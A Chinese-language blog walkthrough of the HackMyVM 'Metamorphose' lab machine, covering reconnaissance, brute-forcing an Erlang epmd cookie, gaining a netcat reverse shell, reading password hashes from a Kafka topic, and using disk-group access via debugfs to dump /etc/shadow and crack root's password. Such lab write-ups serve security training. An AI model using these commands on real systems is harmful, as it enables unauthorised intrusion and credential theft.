HMV Metamorphose - Zsm's blog

Metamorphose#

靶场链接#

https://hackmyvm.eu/machines/machine.php?vm=Metamorphose

日常扫描#

1
┌──(kali㉿kali)-[~]
2
└─$ sudo arp-scan -l -I eth0
3
[sudo] password for kali:
4
Interface: eth0, type: EN10MB, MAC: 12:37:b3:be:69:38, IPv4: 192.168.31.183
5
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
6
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
7
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
8
192.168.31.1    58:ea:1f:38:ff:17       (Unknown)
9
192.168.31.25   08:00:27:78:88:2c       (Unknown)
10
192.168.31.186  42:60:96:7b:26:bd       (Unknown: locally administered)
11
192.168.31.210  f4:6d:3f:27:e6:fb       (Unknown)
12

13
4 packets received by filter, 0 packets dropped by kernel
14
Ending arp-scan 1.10.0: 256 hosts scanned in 1.936 seconds (132.23 hosts/sec). 4 responded
15

16
┌──(kali㉿kali)-[~]
17
└─$ nmap -Pn -sSV -p- -T5 192.168.31.25
18
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-28 12:25 HKT
19
Nmap scan report for 192.168.31.25
20
Host is up (0.0017s latency).
21
Not shown: 65532 closed tcp ports (reset)
22
PORT      STATE SERVICE VERSION
23
22/tcp    open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
24
4369/tcp  open  epmd    Erlang Port Mapper Daemon
25
39441/tcp open  unknown
26
MAC Address: 08:00:27:78:88:2C (Oracle VirtualBox virtual NIC)
27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
28

29
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
30
Nmap done: 1 IP address (1 host up) scanned in 139.14 seconds

反弹shell#

epmd的信息在https://book.hacktricks.wiki/en/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.html 有

按着这个方法打一下

1
┌──(kali㉿kali)-[~]
2
└─$ echo -n -e "\x00\x01\x6e" | nc -vn 192.168.31.25 4369
3
(UNKNOWN) [192.168.31.25] 4369 (epmd) open
4
name network at port 39441
5

6
┌──(kali㉿kali)-[~]
7
└─$ nmap -sV -Pn -n -T4 -p 4369 --script epmd-info 192.168.31.25
8
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-28 12:29 HKT
9
Nmap scan report for 192.168.31.25
10
Host is up (0.0020s latency).
11

12
PORT     STATE SERVICE VERSION
13
4369/tcp open  epmd    Erlang Port Mapper Daemon
14
| epmd-info:
15
|   epmd_port: 4369
16
|   nodes:
17
|_    network: 39441
18
MAC Address: 08:00:27:78:88:2C (Oracle VirtualBox virtual NIC)
19

20
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
21
Nmap done: 1 IP address (1 host up) scanned in 6.35 seconds

github是有个项目的https://github.com/gteissier/erl-matter

直接去找这个漏洞也可以，主要是去爆破cookie

把rockyou字典提取点出来 head -n 1000 /usr/share/wordlists/rockyou.txt > rockyou_top1000.txt

爆破一下

1
┌──(kali㉿kali)-[~/Desktop/epmd/erl-matter-master]
2
└─$ for i in $(cat ./rockyou_top1000.txt); do if ! python2 shell-erldp.py 192.168.31.25 39441 "$i" whoami 2>&1 | grep -q "wrong cookie, auth unsuccessful"; then echo "[+] cookie:$i"; break; fi; done
3

4
[+] cookie:batman
5

6

7
python2 shell-erldp.py 192.168.31.25 39441 batman 'nc -e /bin/bash 192.168.31.183 4444'
8
[*] authenticated onto victim

反弹shell完成

提权#

linpeas传上去没有什么东西，有的也是权限不够

1
melbourne@MiWiFi-R4CM-srv:/$ ss -lntp
2
ss -lntp
3
State  Recv-Q Send-Q      Local Address:Port  Peer Address:PortProcess
4
LISTEN 0      128               0.0.0.0:22         0.0.0.0:*
5
LISTEN 0      128               0.0.0.0:39441      0.0.0.0:*    users:(("beam.smp",pid=864,fd=17))
6
LISTEN 0      128                  [::]:22            [::]:*
7
LISTEN 0      50                      *:2181             *:*
8
LISTEN 0      50     [::ffff:127.0.0.1]:9092             *:*
9
LISTEN 0      4096                    *:4369             *:*
10
LISTEN 0      50                      *:37371            *:*
11
LISTEN 0      50                      *:37883            *:*

居然还有个9092端口在跑东西，去看看，是kafka在跑，去看看这玩意

1
melbourne@MiWiFi-R4CM-srv:/opt/kafka/bin$ ls -la
2
ls -la
3
total 184
4
drwxrwxr-x 3 root root  4096 Feb 17  2024 .
5
drwxrwxr-x 8 root root  4096 Feb 26  2024 ..
6
-rwxrwxr-x 1 root root  1423 Nov 24  2023 connect-distributed.sh
7
-rwxrwxr-x 1 root root  1396 Nov 24  2023 connect-mirror-maker.sh
8
-rwxrwxr-x 1 root root   963 Nov 24  2023 connect-plugin-path.sh
9
-rwxrwxr-x 1 root root  1420 Nov 24  2023 connect-standalone.sh
10
-rwxrwxr-x 1 root root   861 Nov 24  2023 kafka-acls.sh
11
-rwxrwxr-x 1 root root   873 Nov 24  2023 kafka-broker-api-versions.sh
12
-rwxrwxr-x 1 root root   871 Nov 24  2023 kafka-cluster.sh
13
-rwxrwxr-x 1 root root   864 Nov 24  2023 kafka-configs.sh
14
-rwxrwxr-x 1 root root   945 Nov 24  2023 kafka-console-consumer.sh
15
-rwxrwxr-x 1 root root   944 Nov 24  2023 kafka-console-producer.sh
16
-rwxrwxr-x 1 root root   871 Nov 24  2023 kafka-consumer-groups.sh
17
-rwxrwxr-x 1 root root   959 Nov 24  2023 kafka-consumer-perf-test.sh
18
-rwxrwxr-x 1 root root   882 Nov 24  2023 kafka-delegation-tokens.sh
19
-rwxrwxr-x 1 root root   880 Nov 24  2023 kafka-delete-records.sh
20
-rwxrwxr-x 1 root root   866 Nov 24  2023 kafka-dump-log.sh
21
-rwxrwxr-x 1 root root   877 Nov 24  2023 kafka-e2e-latency.sh
22
-rwxrwxr-x 1 root root   874 Nov 24  2023 kafka-features.sh
23
-rwxrwxr-x 1 root root   865 Nov 24  2023 kafka-get-offsets.sh
24
-rwxrwxr-x 1 root root   867 Nov 24  2023 kafka-jmx.sh
25
-rwxrwxr-x 1 root root   870 Nov 24  2023 kafka-leader-election.sh
26
-rwxrwxr-x 1 root root   874 Nov 24  2023 kafka-log-dirs.sh
27
-rwxrwxr-x 1 root root   881 Nov 24  2023 kafka-metadata-quorum.sh
28
-rwxrwxr-x 1 root root   873 Nov 24  2023 kafka-metadata-shell.sh
29
-rwxrwxr-x 1 root root   862 Nov 24  2023 kafka-mirror-maker.sh
30
-rwxrwxr-x 1 root root   959 Nov 24  2023 kafka-producer-perf-test.sh
31
-rwxrwxr-x 1 root root   874 Nov 24  2023 kafka-reassign-partitions.sh
32
-rwxrwxr-x 1 root root   885 Nov 24  2023 kafka-replica-verification.sh
33
-rwxrwxr-x 1 root root 10884 Nov 24  2023 kafka-run-class.sh
34
-rwxrwxr-x 1 root root  1376 Nov 24  2023 kafka-server-start.sh
35
-rwxrwxr-x 1 root root  1361 Nov 24  2023 kafka-server-stop.sh
36
-rwxrwxr-x 1 root root   860 Nov 24  2023 kafka-storage.sh
37
-rwxrwxr-x 1 root root   956 Nov 24  2023 kafka-streams-application-reset.sh
38
-rwxrwxr-x 1 root root   863 Nov 24  2023 kafka-topics.sh
39
-rwxrwxr-x 1 root root   879 Nov 24  2023 kafka-transactions.sh
40
-rwxrwxr-x 1 root root   958 Nov 24  2023 kafka-verifiable-consumer.sh
41
-rwxrwxr-x 1 root root   958 Nov 24  2023 kafka-verifiable-producer.sh
42
-rwxrwxr-x 1 root root  1714 Nov 24  2023 trogdor.sh
43
drwxrwxr-x 2 root root  4096 Nov 24  2023 windows
44
-rwxrwxr-x 1 root root   867 Nov 24  2023 zookeeper-security-migration.sh
45
-rwxrwxr-x 1 root root  1393 Nov 24  2023 zookeeper-server-start.sh
46
-rwxrwxr-x 1 root root  1366 Nov 24  2023 zookeeper-server-stop.sh
47
-rwxrwxr-x 1 root root  1019 Nov 24  2023 zookeeper-shell.sh

那估计得学一下这玩意了

列出主题列表：

1
melbourne@MiWiFi-R4CM-srv:/opt/kafka/bin$ ./\kafka-topics.sh --list --bootstrap-server localhost:9092
2
<-topics.sh --list --bootstrap-server localhost:9092
3

4
__consumer_offsets
5
internal_logs
6
user_feedback
7
users.properties
8
melbourne@MiWiFi-R4CM-srv:/opt/kafka/bin$
9
melbourne@MiWiFi-R4CM-srv:/opt/kafka/bin$
10
melbourne@MiWiFi-R4CM-srv:/opt/kafka/bin$
11
melbourne@MiWiFi-R4CM-srv:/opt/kafka/bin$

kafak里面的身份主要分生产者和消费者两种，可以简单理解为生产者发送消息，消费者接收消息。下面我们要读取主题里面的信息。

1
melbourne@MiWiFi-R4CM-srv:/opt/kafka/bin$ ./kafka-console-consumer.sh --bootstrap-server localhost:9092 --topic users.properties --from-beginning
2
<host:9092 --topic users.properties --from-beginning
3

4

5
{"username": "root", "password": "e2f7a3617512ed81aa68c7be9c435609cfb513b021ce07ee9d2759f08f4d9054", "email": "root@metamorphose.hmv", "role": "admin"}
6
{"username": "saman", "password": "5b5ba511537a7871212f7a978f708aef60a02b80e77ed14dcc59cbd019d6791d", "email": "saman@metamorphose.hmv", "role": "editor"}
7
{"username": "michele", "password": "77e19ed98cf4b945e9034efb30779abd21c70a7b4e3b0ae92ab50db9ca39a75b", "email": "michele@metamorphose.hmv", "role": "viewer"}
8
{"username": "oleesa", "password": "f44609c0c1fe331267c8fe1069f4b67fd67ff95fb9742eede4ec9028fa770bdd", "email": "oleesa@metamorphose.hmv", "role": "admin"}
9
{"username": "sarene", "password": "2f15dacafe7b70bfa88d07d15026cdd40799264c36c120e34a28e7659b6a928d", "email": "sarene@metamorphose.hmv", "role": "viewer"}
10
{"username": "janella", "password": "bc5219396bb2a0de2e0776ad1078f67c417da95d5e009989d7d4ea14823bfb5a", "email": "janella@metamorphose.hmv", "role": "viewer"}
11
{"username": "bronson", "password": "a0ef680b09d2f9821d69416d6c5629d3f109751c0fc3a77592041644e268a65e", "email": "bronson@metamorphose.hmv", "role": "admin"}
12
{"username": "vonda", "password": "b1d83b7991c7a2286abfc2ba555e426a4dd7db4072815f71e3ec45406ab8dd7d", "email": "vonda@metamorphose.hmv", "role": "viewer"}
13
{"username": "toshinari", "password": "5018f7be54a3f684bb01b2d21e293a423f5978da36e19c86abc085d9514b56d2", "email": "toshinari@metamorphose.hmv", "role": "editor"}
14
{"username": "laurie", "password": "597f3fdd0ba9d4af8699dc30e4d1c8c74551e10a56eaad108d34b28ac8d353c7", "email": "laurie@metamorphose.hmv", "role": "user"}
15
{"username": "alia", "password": "d2e5eda5bf734608f1585adffc30846340878e0ab1f0be572ac79f88ac4c808e", "email": "alia@metamorphose.hmv", "role": "admin"}
16
{"username": "raj", "password": "3a76752b3c949f0bdaed819d0f61ae6ca863e5235062a004b23e65059cae6fdd", "email": "raj@metamorphose.hmv", "role": "editor"}
17
{"username": "arleen", "password": "aaf6946a8e02f31cc9542a0bb1cfa6dd49ccd01d57802417a28cf493ad7ff5ad", "email": "arleen@metamorphose.hmv", "role": "editor"}
18
{"username": "melbourne", "password": "a08aa555a5e5b7a73125cf367176ce446eb1d0c07a068077ab4f740a8fded545", "email": "melbourne@metamorphose.hmv", "role": "admin"}
19
{"username": "carolyn", "password": "544c4de6388bf397d905015b085ee359f3813550912467bed347e666d35a1fee", "email": "carolyn@metamorphose.hmv", "role": "viewer"}
20
{"username": "coralie", "password": "9bf4bc753cfb7e1abafb74ec6e3e22e7d47622d2f39a2652b405d34fd50f023e", "email": "coralie@metamorphose.hmv", "role": "admin"}
21
{"username": "farhad", "password": "157e2743e9edc74a954fc6cfa82f77801b66781091955cf0284f0e3819d51dfc", "email": "farhad@metamorphose.hmv", "role": "editor"}
22
{"username": "felix", "password": "3fe0e7fbd33d9ca82f77d1a0c2ff4c28b0d35b8024c61a05bd244ccc28d53816", "email": "felix@metamorphose.hmv", "role": "admin"}
23
{"username": "chase", "password": "e387178e3c60967aadc8e8a795a819d24493c05e2d999e56bf01d08654ef80d2", "email": "chase@metamorphose.hmv", "role": "editor"}
24
{"username": "blakeley", "password": "7cd774b3d7a0d7e8696b0cab072c0cc50dd7ab2ac3db362ebe2cd154a3505b78", "email": "blakeley@metamorphose.hmv", "role": "admin"}
25
{"username": "risa", "password": "9dee3c618985708c50c53854751297a10abc8b02e9f416137816fc408145a6b3", "email": "risa@metamorphose.hmv", "role": "editor"}
26
{"username": "paddy", "password": "d24214a379e0a1115185de1415c0c38f9a90803f1188fb366506eb96b219b838", "email": "paddy@metamorphose.hmv", "role": "editor"}
27
{"username": "min", "password": "c84ef95012d8f8baa4d62b1ea791c158a5daa7f82f611b2b33d344cb14779ceb", "email": "min@metamorphose.hmv", "role": "viewer"}
28
{"username": "ezmeralda", "password": "362d8c0d990e1f8583047fbb0114691e2716a0f11d751ce29604611a7e38275d", "email": "ezmeralda@metamorphose.hmv", "role": "editor"}
29
{"username": "lita", "password": "dd3e6e2665d0f27ecce3a7e017c4d7656ad8e5a78d9d40d21bc044cf96097d66", "email": "lita@metamorphose.hmv", "role": "viewer"}
30
{"username": "angeline", "password": "b460021a7bb42c159a2382a9b1f73944b292bf9748f3a063c5e6a2b73db7ba53", "email": "angeline@metamorphose.hmv", "role": "user"}
31
{"username": "sheridan", "password": "8717128e8774950dc2e58f899bbab4a4ba91fe34ac564d00ec4006169fa0fcc5", "email": "sheridan@metamorphose.hmv", "role": "admin"}
32
{"username": "reid", "password": "a0d1968ca7d8580f53b3b65775a7e126e1d4f6054d396f47ede1e65893d653b3", "email": "reid@metamorphose.hmv", "role": "editor"}
33
{"username": "asher", "password": "1f8642763371ca486ff7a5df412fa8c98abac2371032f35835d15dbdf80cab70", "email": "asher@metamorphose.hmv", "role": "editor"}
34
{"username": "lakyn", "password": "2ac9ee0d8724e344fd8b53b13183e8d66a6ba492b8f52960ef90ddb3c369128a", "email": "lakyn@metamorphose.hmv", "role": "user"}
35
{"username": "aviva", "password": "9daa3d43959547cb632bd9234454ac4a655b1b56d2bcee35d72e9121c0e82768", "email": "aviva@metamorphose.hmv", "role": "user"}
36
{"username": "chabane", "password": "966c4d1242e3c0003d6941ef1a202998ec3b48370728e40505096bfb54039e55", "email": "chabane@metamorphose.hmv", "role": "admin"}

因为home目录下另一个用户名为coralie，所以我们先爆这个用户的哈希。得到my2monkeys

切换用户先，得到user.txt

1
coralie@MiWiFi-R4CM-srv:~$ id
2
id
3
uid=1001(coralie) gid=1001(coralie) groups=1001(coralie),6(disk)

这个时候是挂载在磁盘上的

传个debugfs上去

1
┌──(kali㉿kali)-[~/Desktop/epmd/erl-matter-master]
2
└─$ sftp coralie@192.168.31.25
3
The authenticity of host '192.168.31.25 (192.168.31.25)' can't be established.
4
ED25519 key fingerprint is SHA256:zJTU5deLcEPvqmEkwIcwJqbe2czoKO/Rb3Cg082YD+s.
5
This key is not known by any other names.
6
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
7
Warning: Permanently added '192.168.31.25' (ED25519) to the list of known hosts.
8
coralie@192.168.31.25's password:
9
Connected to 192.168.31.25.
10
sftp> put /usr/sbin/debugfs
11
Uploading /usr/sbin/debugfs to /home/coralie/debugfs
12
debugfs                                       100%  266KB   3.0MB/s   00:00
13
sftp>
14

15
coralie@MiWiFi-R4CM-srv:~$ chmod +x debugfs
16
chmod +x debugfs
17
coralie@MiWiFi-R4CM-srv:~$ ./debugfs /dev/sda1
18
./debugfs /dev/sda1
19
bash: ./debugfs: cannot execute binary file: Exec format error

md，我的是mac，arm版本的，传上去用不了，重新下一个给他传上去

1
coralie@metamorphose:/tmp$ ./debugfs /dev/sda1
2
debugfs 1.47.0 (5-Feb-2023)
3
debugfs:  help
4
Available debugfs requests:
5

6
show_debugfs_params, params
7
                         Show debugfs parameters
8
open_filesys, open       Open a filesystem
9
close_filesys, close     Close the filesystem
10
freefrag, e2freefrag     Report free space fragmentation
11
feature, features        Set/print superblock features
12
dirty_filesys, dirty     Mark the filesystem as dirty
13
init_filesys             Initialize a filesystem (DESTROYS DATA)
14
show_super_stats, stats  Show superblock statistics
15
ncheck                   Do inode->name translation
16
icheck                   Do block->inode translation
17
change_root_directory, chroot
18
                         Change root directory
19
change_working_directory, cd
20
                         Change working directory
21
list_directory, ls       List directory
22
show_inode_info, stat    Show inode information
23
dump_extents, extents, ex
24
                         Dump extents information
25
blocks                   Dump blocks used by an inode
26
filefrag                 Report fragmentation information for an inode
27
link, ln                 Create directory link
28
unlink                   Delete a directory link
29
mkdir                    Create a directory
30
rmdir                    Remove a directory
31
rm                       Remove a file (unlink and kill_file, if appropriate)
32
kill_file                Deallocate an inode and its blocks
33
copy_inode               Copy the inode structure
34
clri                     Clear an inode's contents
35
freei                    Clear an inode's in-use flag
36
seti                     Set an inode's in-use flag
37
testi                    Test an inode's in-use flag
38
freeb                    Clear a block's in-use flag
39
setb                     Set a block's in-use flag
40
testb                    Test a block's in-use flag
41
modify_inode, mi         Modify an inode by structure
42
find_free_block, ffb     Find free block(s)
43
find_free_inode, ffi     Find free inode(s)
44
print_working_directory, pwd
45
                         Print current working directory
46
expand_dir, expand       Expand directory
47
mknod                    Create a special file
48
list_deleted_inodes, lsdel
49
                         List deleted inodes
50
undelete, undel          Undelete file
51
write                    Copy a file from your native filesystem
52
dump_inode, dump         Dump an inode out to a file
53
cat                      Dump an inode out to stdout
54
lcd                      Change the current directory on your native filesystem
55
rdump                    Recursively dump a directory to the native filesystem
56
set_super_value, ssv     Set superblock value
57
set_inode_field, sif     Set inode field
58
set_block_group, set_bg  Set block group descriptor field
59
logdump                  Dump the contents of the journal
60
htree_dump, htree        Dump a hash-indexed directory
61
dx_hash, hash            Calculate the directory hash of a filename
62
dirsearch                Search a directory for a particular filename
63
bmap                     Calculate the logical->physical block mapping for an inode
64
fallocate                Allocate uninitialized blocks to an inode
65
punch, truncate          Punch (or truncate) blocks from an inode by deallocating them
66
symlink                  Create a symbolic link
67
imap                     Calculate the location of an inode
68
dump_unused              Dump unused blocks
69
set_current_time         Set current time to use when setting filesystem fields
70
supported_features       Print features supported by this version of e2fsprogs
71
dump_mmp                 Dump MMP information
72
set_mmp_value, smmp      Set MMP value
73
extent_open, eo          Open inode for extent manipulation
74
zap_block, zap           Zap block: fill with 0, pattern, flip bits etc.
75
block_dump, bdump, bd    Dump contents of a block
76
ea_list                  List extended attributes of an inode
77
ea_get                   Get an extended attribute of an inode
78
ea_set                   Set an extended attribute of an inode
79
ea_rm                    Remove an extended attribute of an inode
80
list_quota, lq           List quota
81
get_quota, gq            Get quota
82
inode_dump, idump, id    Dump the inode structure in hex
83
journal_open, jo         Open the journal
84
journal_close, jc        Close the journal
85
journal_write, jw        Write a transaction to the journal
86
journal_run, jr          Recover the journal
87
help                     Display info on command or topic.
88
list_requests, lr, ?     List available commands.
89
quit, q                  Leave the subsystem.
90

91
debugfs:  cat /etc/shadow
92
root:$y$j9T$iAHGFf9E40kdt5eEY4R790$1Hnu3bkcGq69yrKAWBL9zuT1cLG16/ENdKsxR1omAqB:19779:0:99999:7:::
93
daemon:*:19779:0:99999:7:::
94
bin:*:19779:0:99999:7:::
95
sys:*:19779:0:99999:7:::
96
sync:*:19779:0:99999:7:::
97
games:*:19779:0:99999:7:::
98
man:*:19779:0:99999:7:::
99
lp:*:19779:0:99999:7:::
100
mail:*:19779:0:99999:7:::
101
news:*:19779:0:99999:7:::
102
uucp:*:19779:0:99999:7:::
103
proxy:*:19779:0:99999:7:::
104
www-data:*:19779:0:99999:7:::
105
backup:*:19779:0:99999:7:::
106
list:*:19779:0:99999:7:::
107
irc:*:19779:0:99999:7:::
108
_apt:*:19779:0:99999:7:::
109
nobody:*:19779:0:99999:7:::
110
systemd-network:!*:19779::::::
111
systemd-timesync:!*:19779::::::
112
messagebus:!:19779::::::
113
avahi-autoipd:!:19779::::::
114
sshd:!:19779::::::
115
ntpsec:!:19779::::::
116
epmd:!:19779::::::
117
melbourne:$y$j9T$9AW5vMwISGEth89TZdLQX.$3oxC.VAZ57n4S94eRdZzcsGbgIoiAxWTdCP7afTV7x2:19779:0:99999:7:::
118
coralie:$y$j9T$knJbyxpFrCvXDa/DDdck/1$GKzq8p7o9Qjurg6bzmM6TZtilp3qY8caDnkDYDJas35:19779:0:99999:7:::

开爆root的密码

1
┌──(kali㉿kali)-[~/Desktop/epmd/erl-matter-master]
2
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash --format=crypt
3
Using default input encoding: UTF-8
4
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
5
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
6
Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
7
Will run 4 OpenMP threads
8
Press 'q' or Ctrl-C to abort, almost any other key for status
9
qazwsxedc        (root)
10
1g 0:00:00:04 DONE (2025-02-28 13:18) 0.2040g/s 411.4p/s 411.4c/s 411.4C/s amore..jesusfreak
11
Use the "--show" option to display all of the cracked passwords reliably
12
Session completed.

gameover

a ctfer on the load

Metamorphose#

靶场链接#

日常扫描#

反弹shell#

提权#